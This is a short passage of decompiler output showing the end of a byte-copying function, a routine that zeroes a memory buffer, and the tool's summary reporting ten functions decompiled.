    ++v4;
    result = &a3[*(_DWORD *)&v6[1]];
    v6[0] = a3[*(_DWORD *)&v6[1]];
  }
  *(_BYTE *)(v4 + a1) = 0;
  return result;
}

//----- (00402B10) --------------------------------------------------------
int __cdecl sub_402B10(int a1, int a2)
{
  int result; // eax
  int i; // [esp+0h] [ebp-4h]

  for ( i = 0; ; ++i )
  {
    result = a2 / 4;
    if ( i >= a2 / 4 )
      break;
    *(_DWORD *)(a1 + 4 * i) = 0;
  }
  return result;
}

// nfuncs=10 queued=10 decompiled=10 lumina nreq=0 worse=0 better=0
// ALL OK, 10 function(s) have been successfully decompiled
